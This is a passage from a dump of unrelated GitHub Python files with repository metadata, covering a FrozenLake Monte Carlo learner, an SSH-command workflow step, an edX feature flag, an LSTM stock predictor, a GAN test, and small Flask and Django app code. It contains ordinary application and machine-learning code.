right, 3 = up)\nNOUP = [i for i in range(SIZE)]\nNODOWN = [state_size-1-i for i in range(SIZE)]\nNOLEFT = [i*SIZE for i in range(SIZE)]\nNORIGHT = [i*SIZE + SIZE - 1 for i in range(SIZE)]  # rightmost column of each row\n\n\ntotal_episodes = 10000 # 1000\nsave_interval = total_episodes//20\nlearning_rate = 0.8\nmax_steps = 99\ngamma = 0.95\n\nglobal win, loss, timeout\nwin,loss,timeout = 0,0,0\n\n# # Exponential Decay of epsilon\nepsilon = 1.0\nmax_epsilon = 1.0\nmin_epsilon = 0.005\ndecay_rate = 0.001\n\nresults_array = []\n# Fixed P(Exploration) = epsilon Method\n# epsilon = 0.01\nwith open(str(experiment_dir)+'\\\\results.txt', 'w') as f:\n    f.write(f\"Method: MonteCarlo \\n\")\n    f.write(f\"------------------Parameters------------------\\n\")\n    f.write(f\"Size: {SIZE} Learning Rate: {learning_rate} Gamma: {gamma}\\n\")\n    f.write(f\"Epsi_Init: {epsilon} Epsi_Max: {max_epsilon} \\n\")\n    f.write(f\"Epsi_Min: {min_epsilon} Decay: {decay_rate}\\n\")\n    f.write(f\"Start Time: {timestr} \\n\")\n\nrewards = []\nfor episode in range(total_episodes):\n    statestate = env.reset()\n    state = statestate[0]\n    total_rewards = 0\n\n    sa_seq = []\n\n    env.render()\n    action_list = possible_actions(state)\n    # action = env.action_space.sample()\n    action = np.random.choice(action_list)\n\n    # for step in range(max_steps):\n    # For infinite runtime in MC method\n    step = 0\n    done = False\n    while not done:\n        step += 1\n        new_state, reward, done, truncated, info = env.step(action) \n\n        # print(f\"Epsiode {episode}, Step {step}\")\n        # print(f\"state at {state}\")\n\n        sa_seq.append((state, action, reward))\n        ntable[state, action] += 1  # count the (state, action) pair actually taken\n        exp_exp_tradeoff = random.uniform(0, 1)\n\n        state = new_state\n        total_rewards += reward\n\n        if exp_exp_tradeoff > epsilon:\n            # action = np.argmax(qtable[state])\n            try:\n                action_list = possible_actions(state) \n                row = list(qtable[state])\n                goodq = []\n                for i in action_list:\n                    goodq.append(row[i])\n\n                max_value = np.max(goodq)\n                max_indices = np.where(row == max_value)[0]\n                if len(max_indices) == 1:\n                    action = max_indices[0]\n                else:\n                    # if there are multiple maximum indices, choose one randomly\n                    action = np.random.choice(max_indices)\n            except:\n                action = np.argmax(qtable[state])\n\n        else:\n            action_list = possible_actions(state)
\n            # action = env.action_space.sample()\n            action = np.random.choice(action_list)\n\n        # action = input(\"Action Here: \")\n\n        # for i in range(4):\n        #     print(env.action_space.sample())\n        # env.render()\n\n        # action = int(action)\n        # sa_seq.append((state,action))\n        # print(f\"state at {state}\")\n        # print(f'action at {action}')\n\n\n\n        # print(epsilon)\n\n        if done: \n            if reward == 1:\n                win += 1\n            else:\n                loss += 1  # FrozenLake returns reward 0 when the agent falls into a hole\n\n            break\n    \n    # print(\"Episode Simulated\")\n    # print(sa_seq)\n\n    # # ChatGPT\n    # returns = {}\n    # g = 0\n    # for t in reversed(range(len(sa_seq))):\n    #     state, action, reward = sa_seq[t]\n    #     g = gamma * g + reward\n    #     if (state, action) not in returns:\n    #         returns[(state, action)] = []\n    #     returns[(state, action)].append(g)\n\n    # print(returns)\n    # for state_action, g_list in returns.items():\n    #     state, action = state_action\n    #     print(state,action)\n    #     rtable[state, action] += g_list\n    #     print(rtable)\n    #     qtable[state, action] = np.mean(rtable[state, action])\n\n    # Modified: first-visit Monte Carlo update. Walking the episode backwards while\n    # overwriting on every visit leaves each pair holding the return of its earliest visit.\n    returns = {}\n    g = 0\n    for t in reversed(range(len(sa_seq))):\n        state, action, reward = sa_seq[t]\n        g = gamma * g + reward\n        returns[(state, action)] = [g]\n\n    for (state, action), g_list in returns.items():\n        rtable[state][action] += g_list\n        qtable[state, action] = np.mean(rtable[state][action])\n\n\n\n    # print(\"Qtable update done\")\n    # tl = len(sa_seq)\n    # # dupes = find_duplicates(sa_seq)\n    # # print(dupes)\n    # # print(sa_seq)\n    # big_G = 0\n    # R = total_rewards\n\n    # s_a = sa_seq[-1]\n    # s,a = [sa_seq[-1][0]],[sa_seq[-1][1]]\n\n\n    # g_seq = {}\n    # g_seq[str((s,a))] = [big_G]\n\n    # for j in range(tl-1):\n    #     big_G = gamma*big_G + R\n    #     idx = (-1)*(j+2)\n    #     s_a = sa_seq[idx]\n    #     s,a = [sa_seq[idx][0]],[sa_seq[idx][1]]\n    #     # print(s,a)\n    #     R= qtable[s,a]\n    #     if str((s,a)) not in g_seq.keys():\n    #         g_seq[str((s,a))] = [big_G]\n    #     else:\n    #         g_seq[str((s,a))].insert(0,big_G)\n\n    #     # g_seq.insert(0,big_G)\n\n    # # print(g_seq)\n    # for k in g_seq.keys():\n\n    #     kt = eval(k)\n    #     # print(kt)\n    #     testset = (int(kt[0][0]), int(kt[1][0]))\n\n    #     # print(testset)\n    #     firstinstval = float(g_seq[k][0])\n    #     rtable[testset[0]][testset[1]].append(firstinstval)\n\n    #     toupdateQ = np.average(\n    #         rtable[testset[0]][testset[1]] \n    #     )\n    #     qtable[testset[0]][testset[1]]= toupdateQ\n\n\n\n    # print(rtable)\n    \n    # next_ep = input(\"Next Episode? : \")\n    # while next_ep == False:\n    #     next_ep = input(\"Next Episode? 
: \")\n\n\n # if episode % 50 == 0:\n # np.save('qtable.npy',qtable)\n # # np.save('ntable.npy',ntable)\n\n # print(epsilon)\n # print(qtable)\n # # print(ntable)\n\n\n epsilon = min_epsilon + (max_epsilon - min_epsilon) * np.exp(-decay_rate * (episode+1))\n print(f\"Win: {win}, Loss: {loss}, Timeout:{timeout}\")\n with open(str(experiment_dir)+'\\\\results.txt', 'a') as g:\n g.write(f\"Episode {episode+1}: Steps: {step}, Reward: {total_rewards} Epsilon: {epsilon}\\n\")\n\n if (episode+1) % save_interval == 0:\n np.save(str(experiment_dir)+f'\\\\qtable{episode}.npy',qtable)\n np.save(str(experiment_dir)+f'\\\\ntable{episode}.npy',ntable)\n\n # print(epsilon)\n # print(qtable)\n # print(ntable)\n\n results_array.append([step,total_rewards])\n rewards.append(total_rewards)\n print('[*] episode {}, total reward {}, average score {}'.format(episode, total_rewards, sum(rewards)/(episode+1)))\n\n# print(qtable)\n# print(ntable)\nnp.save(str(experiment_dir)+'\\\\qtable_final.npy',qtable)\nnp.save(str(experiment_dir)+'\\\\ntable_final.npy',ntable)\nep_step_arr = np.array(results_array)\nprint(ep_step_arr.shape)\nnp.save(str(experiment_dir)+'\\\\results_raw.npy',ep_step_arr)\n# np.save('qtable_final.npy',qtable)\n# np.save('ntable_final.npy',ntable)\n\n# Play the game\n\n# tocontinue = input(\"Proceed with Final Demonstration?\")\n# # Final Demo, Showcase Best Scenario\n# for episode in range(1):\n# statestate = env.reset()\n# state = statestate[0]\n# print('*'*20)\n# print('EPISODE ', episode)\n\n# for step in range(max_steps):\n# env.render()\n# action = np.argmax(qtable[state])\n# new_state, reward, done, truncated, info = env.step(action) \n \n# if done: break\n\nenv.close()","repo_name":"epsilonfunction/me5406_frozenlake","sub_path":"method/markov_huh.py","file_name":"markov_huh.py","file_ext":"py","file_size_in_byte":9843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14230517687","text":"import string\nimport random\n\nclass RandomStringUtils:\n\t@staticmethod\n\tdef random(count):\n\t\tpass\n\n\t@staticmethod\n\tdef randomAscii(count):\n\t\tasscii = string.printable\n\t\ts = ''\n\t\tfor i in range(0, count):\n\t\t\ts = s+random.choice(asscii)\n\t\treturn s\n\n\t@staticmethod\n\tdef randomAlphabetic(count):\n\t\tascii_letters = string.ascii_letters\n\t\ts = ''\n\t\tfor i in range(0, count):\n\t\t\ts = s+random.choice(ascii_letters)\n\t\treturn s\n\n\t@staticmethod\n\tdef randomAlphanumeric(count):\n\t\talphanumeric = string.ascii_letters+string.digits\n\t\ts = ''\n\t\tfor i in range(0, count):\n\t\t\ts += random.choice(alphanumeric)\n\t\treturn s\n\n\t@staticmethod\n\tdef randomNumeric(count):\n\t\tdigits = string.digits\n\t\ts = ''\n\t\tfor i in range(0, count):\n\t\t\ts = s+random.choice(digits)\n\t\treturn s\n","repo_name":"Beescast/Beeslm","sub_path":"beesInterface/utils/randomStringUtils.py","file_name":"randomStringUtils.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"70145921362","text":"import logging\n\nfrom core.processor import Processor\nfrom utils.ParamikoUtil import ParamikoUtil\nfrom paramiko.client import SSHClient\n\n\nclass RUN_SSH_COMMANDProcessor(Processor):\n TPL: str = '{\"ssh_client_key\":\"sshclient\", \"cmd\":\"\", \"output_key\":\"\", \"close_after_run\":\"yes|no\"}'\n DESC: str = f''' \n - run ssh via paramiko, save result to output_key of data_chain. 
\n\n {TPL}\n\n '''\n def process(self):\n\n ssh_client: SSHClient = self.get_data(self.get_param(\"ssh_client_key\"))\n\n if not ssh_client is None:\n cmd = self.expression2str(self.get_param(\"cmd\"))\n output_key = self.get_param(\"output_key\")\n\n output = ParamikoUtil.run_ssh_cmd(ssh_client, cmd)\n self.populate_data(output_key, output)\n\n close_after_run = True if self.get_param(\"close_after_run\") == \"yes\" else False\n\n if close_after_run:\n ParamikoUtil.close_ssh_client(ssh_client)\n else:\n logging.warning('ssh_client is not available, please use CREATE_SSH_CLIENT task to setup.')\n","repo_name":"lorisunjunbin/petp","sub_path":"core/processors/RUN_SSH_COMMANDProcessor.py","file_name":"RUN_SSH_COMMANDProcessor.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"12606911533","text":"\"\"\"\nConfiguration for features of Learner Home\n\"\"\"\nfrom django.conf import settings\n\nfrom edx_toggles.toggles import WaffleFlag\n\nfrom openedx.core.djangoapps.site_configuration import helpers as configuration_helpers\n\n# Namespace for Learner Home MFE waffle flags.\nWAFFLE_FLAG_NAMESPACE = \"learner_home_mfe\"\n\n# .. toggle_name: learner_home_mfe.enabled\n# .. toggle_implementation: WaffleFlag\n# .. toggle_default: False\n# .. toggle_description: Waffle flag to enable to redirect user to learner home mfe\n# .. toggle_use_cases: open_edx\n# .. toggle_creation_date: 2022-10-11\n# .. toggle_tickets: AU-879\nENABLE_LEARNER_HOME_MFE = WaffleFlag(\n f\"{WAFFLE_FLAG_NAMESPACE}.enabled\",\n __name__,\n)\n\n\ndef should_redirect_to_learner_home_mfe(user):\n \"\"\"\n Redirect a percentage of learners to Learner Home for experimentation.\n\n Percentage is based on the LEARNER_HOME_MFE_REDIRECT_PERCENTAGE setting.\n \"\"\"\n\n is_learning_mfe_enabled = configuration_helpers.get_value(\n \"ENABLE_LEARNER_HOME_MFE\", ENABLE_LEARNER_HOME_MFE.is_enabled()\n )\n\n learning_mfe_redirect_percent = configuration_helpers.get_value(\n \"LEARNER_HOME_MFE_REDIRECT_PERCENTAGE\",\n settings.LEARNER_HOME_MFE_REDIRECT_PERCENTAGE,\n )\n\n # Redirect when 1) Learner Home MFE is enabled and 2) a user falls into the\n # target range for experimental rollout.\n if is_learning_mfe_enabled and user.id % 100 < learning_mfe_redirect_percent:\n return True\n\n return False\n","repo_name":"openedx/edx-platform","sub_path":"lms/djangoapps/learner_home/waffle.py","file_name":"waffle.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"16214793328","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n# Import Libraries\n\n\n# In[1]:\n\n\nimport math\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas_datareader as web\nimport datetime as dt\n\nfrom sklearn.preprocessing import MinMaxScaler\nfrom tensorflow.keras.models import Sequential\nfrom keras.layers import Dense, Dropout, LSTM\nimport yfinance as yf\n\n\n# In[ ]:\n\n\n# Import Data\n\n\n# In[2]:\n\n\ndf= yf.download('SOLIMAC.BO', start='2012-01-01', end='2020-01-01')\n\ndf\n\n\n# In[ ]:\n\n\n# Train the Data\n\n\n# In[3]:\n\n\nscaler = MinMaxScaler(feature_range=(0,1))\n\nscaled_data = scaler.fit_transform(df ['Close'].values.reshape(-1,1))\n\nprediction_days = 60\n\nx_train = []\ny_train = []\n\nfor x in range (prediction_days, len(scaled_data)):\n x_train.append(scaled_data[x-prediction_days:x, 0])\n 
y_train.append(scaled_data[x,0])\n    \n\n\nx_train, y_train = np.array(x_train), np.array(y_train)\nx_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))\n\n\n# In[4]:\n\n\n# Build the model\n\n\n# In[5]:\n\n\nmodel = Sequential()\n\nmodel.add(LSTM(units=50, return_sequences=True, input_shape = (x_train.shape[1],1)))\nmodel.add(Dropout(0.2))\nmodel.add(LSTM(units=50, return_sequences=True))\nmodel.add(Dropout(0.2))\nmodel.add(LSTM(units=50))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(units=1)) # Prediction of the next day's price\n\nmodel.compile(optimizer='adam', loss ='mean_squared_error')\nmodel.fit(x_train, y_train, epochs=25, batch_size=32)\n\n\n# In[6]:\n\n\ntest_data = yf.download('SOLIMAC.BO', start='2020-01-01', end='2023-09-02')\nactual_prices = test_data['Close'].values\n\ntotal_dataset = pd.concat((df['Close'], test_data['Close']), axis=0)\n\nmodel_inputs = total_dataset[len(total_dataset)-len(test_data)-prediction_days:].values\nmodel_inputs = model_inputs.reshape(-1, 1)\nmodel_inputs = scaler.transform(model_inputs)\n\n\n# In[7]:\n\n\ntest_data.tail(10)\n\n\n# In[8]:\n\n\n# Predictions\n\n\n# In[9]:\n\n\nx_test = []\n\nfor x in range (prediction_days, len(model_inputs)):\n    x_test.append(model_inputs[x-prediction_days:x, 0])\n\nx_test = np.array(x_test)\nx_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], 1))\n\npredicted_prices = model.predict(x_test)\npredicted_prices = scaler.inverse_transform(predicted_prices)\n\n\n# In[10]:\n\n\n# Plot the prediction\n\n\n# In[11]:\n\n\nplt.plot(actual_prices, color= \"black\", label = f\"Actual {'SOLIMAC.BO'} Price\")\nplt.plot(predicted_prices, color= \"green\", label = f\"Predicted {'SOLIMAC.BO'} Price\")\nplt.title(f\"{'SOLIMAC.BO'} Share Price\")\nplt.xlabel('Time')\nplt.ylabel(f\"{'SOLIMAC.BO'} Share Price\")\nplt.legend()\nplt.show()\n\n\n# In[12]:\n\n\n# Prediction for next day\n\n\n# In[13]:\n\n\n# Use the last prediction_days scaled inputs as the single input window\nreal_data = [model_inputs[len(model_inputs) - prediction_days:len(model_inputs), 0]]\nreal_data = np.array(real_data)\nreal_data = np.reshape(real_data, (real_data.shape[0], real_data.shape[1],1))\n\nprediction = model.predict(real_data)\nprediction = scaler.inverse_transform(prediction)\nprint(f\"Prediction: {prediction}\")\n\n","repo_name":"ChiragKapoor30/Projects","sub_path":"Stock Price Prediction.py","file_name":"Stock Price Prediction.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43194885463","text":"import sys\n\n\ndef commStr(str1, str2):\n    resultStr = ''\n    i = 0\n    while i < len(str1):\n        if str1[i] in str2 and str1[i] not in resultStr:\n            resultStr += str1[i]\n        i += 1\n    return resultStr\n\n\ncommStr('loli', 'lali')\n\n\n# Redefinition: same idea, but only keeps alphabetic characters\ndef commStr(str1, str2):\n    resultStr = ''\n    i = 0\n    while i < len(str1):\n        if str1[i].isalpha() and str1[i] in str2 and str1[i] not in resultStr:\n            resultStr = resultStr + str1[i]\n        i += 1\n    return resultStr\n\n\ndef commStrArr(str1, str2):\n    ressltArr = []\n    for ch in str1:\n        if ch.isalpha() and ch in str2 and ch not in ressltArr:\n            ressltArr.append(ch)\n    return ''.join(ressltArr)\n\n\nprint(commStr('1l\\t olipfhidfhge', '1lolllllll\\t lllllllllllooooooop'))\n\nprint(commStr('loli', 'luck') == 'l')\nprint(commStr('good day', 'good morning') == 'god')\n\n\ndef commStrSet(str1: str, str2):\n    ressltSet = set()\n    i = 0\n    for ch in str1:\n        i += 1\n        if ch.isalpha() and ch in str2:\n            ressltSet.add(ch)\n    print(i)\n    return 
''.join(ressltSet)\n","repo_name":"denysmarakhovskyi/python-hw-2","sub_path":"Ex4.py","file_name":"Ex4.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25731249369","text":"import pytest\n\nfrom terrarium.model import ModelFactory\n\n\n@pytest.fixture(scope=\"function\")\ndef factory(session):\n return ModelFactory(session)\n\n\n@pytest.fixture(scope=\"module\")\ndef users(session):\n plan = session.Plan.one()\n plans1 = session.Plan.last(10, query=dict(user_id=plan.user_id))\n plans2 = session.Plan.last(10, query=\"user_id != {}\".format(plan.user_id))\n\n plans = plans1 + plans2\n user_ids = {p.user_id for p in plans}\n users = session.User.find(list(user_ids))\n return users\n\n\ndef test_empty_model(factory):\n model = factory.new()\n assert model\n\n\n@pytest.mark.parametrize(\"num\", [1, 11])\ndef test_model_factory_new(session, factory, num):\n \"\"\"Expect factory to pull in exactly the specified number of plans.\"\"\"\n plans = session.Plan.last(num)\n model = factory.new(plans)\n assert len(model.weight_container.plans) == num\n\n\ndef test_model_factory_emulate_single_user(factory, config, session):\n \"\"\"Expect emulate to pull in specified number of plans, all belonging to\n the single user.\"\"\"\n login = config[\"login\"]\n user = session.User.one(query=dict(login=login))\n assert len(session.Plan.last(10, query=dict(user_id=user.id))) == 10\n model = factory.emulate(login=login, limit=10)\n assert len(model.weight_container.plans) == 10\n for p in model.weight_container.plans:\n assert p.user_id == user.id\n\n\ndef test_model_attributes(session, factory):\n \"\"\"Models should have a 'version', 'name', 'updated'.\"\"\"\n\n model = factory.new(session.Plan.last(1))\n assert hasattr(model, \"version\")\n assert hasattr(model, \"name\")\n assert hasattr(model, \"created_at\")\n assert hasattr(model, \"updated_at\")\n\n\n@pytest.mark.parametrize(\"num\", [1, 10])\ndef test_build(session, factory, num):\n \"\"\"Build a small, new model.\"\"\"\n model = factory.new(session.Plan.last(num))\n model.print_info()\n model.build()\n\n\ndef test_basic_search(autoplan_model, session):\n autoplan_model.log.set_verbose(True)\n\n ignore_ots = session.OperationType.where(\n {\"category\": \"Control Blocks\", \"deployed\": True}\n )\n ignore = [ot.id for ot in ignore_ots]\n\n autoplan_model.add_model_filter(\n \"AllowableFieldType\", \"exclude\", lambda m: m.field_type.parent_id in ignore\n )\n\n autoplan_model.search_graph(\n session.Sample.one(),\n session.ObjectType.find_by_name(\"Yeast Glycerol Stock\"),\n session.ObjectType.find_by_name(\"Fragment Stock\"),\n )\n\n\ndef test_model_saves_and_load(factory, tmpdir, session):\n model = factory.new(session.Plan.last(10))\n model.build()\n path = tmpdir.mkdir(\"models\").join(\"test_model.pkl\")\n model.save(path)\n\n loaded = factory.load_model(path)\n assert len(loaded.weight_container._edge_counter.counter) > 0\n assert len(loaded.weight_container._node_counter.counter) > 0\n\n\ndef test_model_add(factory, users):\n models = [factory.emulate(u.login, limit=10) for u in users[:3]]\n for m in models:\n m.print_info()\n m.build()\n new_model = factory.new()\n for m in models:\n new_model += m\n\n for k, v in new_model.weight_container._edge_counter.counter.items():\n summed = 0\n for m in models:\n summed += m.weight_container._edge_counter.counter[k]\n assert v == summed\n\n for k, v in 
new_model.weight_container._node_counter.counter.items():\n summed = 0\n for m in models:\n summed += m.weight_container._node_counter.counter[k]\n assert v == summed\n\n assert new_model\n\n\ndef test_model_mul(factory, users):\n models = [factory.emulate(u.login, limit=10) for u in users[:1]]\n m = models[0]\n m.build()\n new_model = m * 3\n\n\ndef test_model_compose_complex(factory, users):\n models = [factory.emulate(u.login, limit=10) for u in users[:4]]\n for m in models:\n m.print_info()\n m.build()\n\n m1 = models[0]\n m2 = models[1]\n m3 = models[3]\n\n m4 = m1 + m2 * 3 + m3\n","repo_name":"jvrana/Terrarium","sub_path":"tests/live_tests/test_model/test_model_factory.py","file_name":"test_model_factory.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"3"} +{"seq_id":"5191719471","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport sys\nsys.path.append('/content/drive/My Drive/drive/gan/gan_git-02/gan_git/compare_gan/')\nsys.path.append('/content/drive/My Drive/drive/gan/gan_git-02/gan_git/')\nprint(sys.path)\nimport os\nfrom absl import flags\nfrom absl.testing import parameterized\nfrom compare_gan import datasets\nfrom compare_gan import test_utils\nfrom compare_gan.gans import consts as c\nfrom compare_gan.gans import loss_lib\nfrom compare_gan.gans.s3gan import S3GAN\nimport gin\nimport tensorflow as tf\nimport tensorflow_hub as hub\n\nFLAGS = flags.FLAGS\nSTEPS_PER_EPOCH = 50\nNUM_EPOCHS = 100\n\nclass S3GANTest(parameterized.TestCase, test_utils.CompareGanTestCase):\n# @parameterized.parameters(\n# {\"use_predictor\": False, \"self_supervision\": \"rotation\"}, # only SS.\n# {\"use_predictor\": False, \"project_y\": False}, # unsupervised.\n# {\"use_predictor\": False}, # fully supervised.\n# {\"use_predictor\": True}, # only oracle.\n# {\"use_predictor\": True, \"self_supervision\": \"rotation\"}, # oracle + SS.\n#\n# )\n def testSingleTrainingStepArchitectures(\n self, use_predictor = True, project_y=True, self_supervision=\"rotation\"):\n print(\"-----------------------testSingleTrainingStepArchitectures,s\")\n parameters = {\n \"architecture\": c.RESNET_BIGGAN_ARCH,\n \"lambda\": 1,\n \"z_dim\": 120,\n }\n with gin.unlock_config():\n gin.bind_parameter(\"ModularGAN.conditional\", True)\n gin.bind_parameter(\"loss.fn\", loss_lib.hinge)\n gin.bind_parameter(\"S3GAN.use_predictor\", use_predictor)\n gin.bind_parameter(\"S3GAN.project_y\", project_y)\n gin.bind_parameter(\"S3GAN.self_supervision\", self_supervision)\n \n # Fake ImageNet dataset by overriding the properties.\n dataset = datasets.get_dataset(\"RotorWinding_128\")\n \n model_dir = self._get_empty_model_dir()\n# run_config = tf.contrib.tpu.RunConfig(\n# model_dir=model_dir,\n# tpu_config=tf.contrib.tpu.TPUConfig(iterations_per_loop=1))\n session_config = tf.compat.v1.ConfigProto(allow_soft_placement=True)\n session_config.gpu_options.per_process_gpu_memory_fraction = 0.9\n run_config = tf.estimator.RunConfig(model_dir=model_dir, save_checkpoints_steps=50, keep_checkpoint_max = 1 ).replace(session_config=session_config)\n\n gan = S3GAN(\n dataset=dataset,\n parameters=parameters,\n model_dir=model_dir,\n g_optimizer_fn=tf.compat.v1.train.AdamOptimizer,\n g_lr=0.0002,\n rotated_batch_fraction=2)\n\n print(\"-----------------------tf.estimator.TrainSpec\")\n train_spec = tf.estimator.TrainSpec(input_fn=gan.input_fn,max_steps=STEPS_PER_EPOCH * 
NUM_EPOCHS)\n        print(\"-----------------------tf.estimator.EvalSpec\")\n        eval_spec = tf.estimator.EvalSpec(input_fn=gan.eval_input_fn, steps = 20, throttle_secs = 1)\n        print(\"-----------------------gan.as_estimator\")\n        estimator = gan.as_estimator(run_config=run_config, model_dir=model_dir, batch_size=8, use_tpu=False)\n        #estimator.train(gan.input_fn, steps=1)\n        print(\"-----------------------tf.estimator.train_and_evaluate\")\n        tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)\n        print(\"-----------------------testSingleTrainingStepArchitectures,e\")\n        \n############################################################----save hub module----##############################################\n        module_spec = gan.as_gen_hub_module_spec()\n        export_path = os.path.join(model_dir, \"gene_hub\")\n        checkpoint_path = os.path.join(model_dir,\"model.ckpt-\" + str(STEPS_PER_EPOCH * NUM_EPOCHS))\n        if not tf.io.gfile.exists(export_path):\n            module_spec.export(export_path, checkpoint_path=checkpoint_path)\n        \n\n    \n    \nif __name__ == \"__main__\":\n    tf.test.main()","repo_name":"youbin-jia/jyb_paper","sub_path":"gan_git-02/gan_git/compare_gan/gans/s3gan_test.py","file_name":"s3gan_test.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21330202242","text":"from flask import current_app, jsonify\n\nfrom app import errors\nfrom app.exam.exam_config import ReportConfig\nfrom app.models.exam import CurrentTestModel, HistoryTestModel\n\n\n# Look the test up in current first; fall back to history if it is not there\ndef get_exam_by_id(test_id):\n    test = CurrentTestModel.objects(id=test_id).first()\n    if test is None:\n        test = HistoryTestModel.objects(current_id=test_id).first()\n    return test\n\n\n# Extract the useful fields from score and feature\ndef get_score_and_feature(question_list):\n    score = {}  # {1:{'quality': 80}, 2:{'key':100,'detail':xx}, ...}\n    feature = {}\n    handling = False  # whether any question is still being processed\n\n    # Iterate over the questions of this test, pulling out the scores and\n    # features needed for the later analysis\n    for i in range(len(question_list), 0, -1):\n        if question_list[str(i)]['status'] == 'finished':\n            score[i] = question_list[str(i)]['score']\n            feature[i] = feature_filter(question_list[str(i)]['feature'], question_list[str(i)]['q_type'])\n        else:\n            score[i] = {\"quality\": 0, \"key\": 0, \"detail\": 0, \"structure\": 0, \"logic\": 0}\n            feature[i] = {}\n            if question_list[str(i)]['status'] == 'handling':\n                handling = True\n\n    return handling, score, feature\n\n\n# Extract the features used when generating the report.\n# Retelling questions (types 2, 5, 6, 7, etc.) need no features;\n# their reports are generated from the scores alone.\ndef feature_filter(feature_dict, q_type):\n    ret = {}\n    if q_type == 1:\n        ret['clr_ratio'] = feature_dict['clr_ratio']\n        ret['ftl_ratio'] = feature_dict['ftl_ratio']\n        ret['interval_num'] = feature_dict['interval_num']\n        ret['speed'] = feature_dict['speed']\n    elif q_type == 3:\n        ret['structure_hit'], ret['structure_not_hit'] = [], []\n        ret['logic_hit'], ret['logic_not_hit'] = [], []\n        for item in ReportConfig.structure_list:\n            if feature_dict[item + '_num'] > 0:\n                ret['structure_hit'].append(item)\n            else:\n                ret['structure_not_hit'].append(item)\n        for item in ReportConfig.logic_list:\n            if feature_dict[item + '_num'] > 0:\n                ret['logic_hit'].append(item)\n            else:\n                ret['logic_not_hit'].append(item)\n\n    return ret\n","repo_name":"llf-970310/expression-flask","sub_path":"app/exam/manager/exam.py","file_name":"exam.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73410218962","text":"from typing 
import Union\n\nfrom models import db, Player\nfrom schemas import player_schema\nfrom marshmallow import ValidationError\n\n\nclass PlayerService:\n @staticmethod\n def create_player(fields: dict) -> Union[dict, tuple]:\n if not fields:\n return {\"message\": \"No input data provided\"}, 400\n try:\n player_data = player_schema.load(fields, session=db.session)\n except ValidationError as err:\n return err.messages, 422\n db.session.add(player_data)\n db.session.commit()\n return player_schema.dump(player_data)\n\n @staticmethod\n def get_player_by_id(player_id: int) -> dict:\n player = db.get_or_404(Player, player_id, description='Player with specified id was not found')\n return player_schema.dump(player)\n\n @classmethod\n def delete_player_by_id(cls, player_id: int) -> int:\n player = db.get_or_404(Player, player_id, description='Player with specified id was not found')\n db.session.delete(player)\n db.session.commit()\n return player_id\n\n @staticmethod\n def get_all_players() -> dict:\n quotes = Player.query.all()\n result = player_schema.dump(quotes, many=True)\n return result","repo_name":"ligain/tic_tac_toe","sub_path":"app/services/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23790115854","text":"#-*- coding: utf-8 -*-\nimport sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\nfrom django.shortcuts import get_object_or_404,render\nfrom django.core.urlresolvers import reverse\n# Create your views here.\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom dosirak.models import Question,Reply\nfrom django.template import RequestContext, loader\nfrom django.utils import timezone\n\ndef index(request):\n question_list=Question.objects.order_by('-pub_date')[:]\n #template = loader.get_template('dosirak/index.html')\n #context = RequestContext(request, {\n # 'question_list': question_list,\n #})\n context={'question_list':question_list}\n #return HttpResponse(output+template.render(context))\n return render(request, 'dosirak/index.html', context)\n\ndef detail(request, question_id):\n question=get_object_or_404(Question,pk=question_id)\n reply_list=Reply.objects.order_by('question')[:]\n return render(request, 'dosirak/detail.html', {'question':question,'reply_list':reply_list})\n\ndef results(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'dosirak/taken.html', {'question': question})\n\ndef again(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'dosirak/error.html', {'question': question})\n\ndef vote(request, question_id):\n p = get_object_or_404(Question, pk=question_id)\n taste=request.POST.get('taste')\n service=request.POST.get('service')\n price=request.POST.get('price')\n air=request.POST.get('air')\n cleanness=request.POST.get('cleanness')\n replier=request.POST.get('replier')\n review=request.POST.get('review')\n star_set=[taste,service,price,air,cleanness]\n if star_set.__contains__('0') or (replier is None or review is None):\n return HttpResponseRedirect(reverse('again', args=(p.id,)))\n else:\n add_reply=Reply(question=p,name=replier,count_taste=taste,count_price=price,count_service=service,count_air=air,count_cleanness=cleanness,reple=review,rep_date=timezone.now())\n add_reply.save()\n add_reply.update_Question()\n return HttpResponseRedirect(reverse('results', 
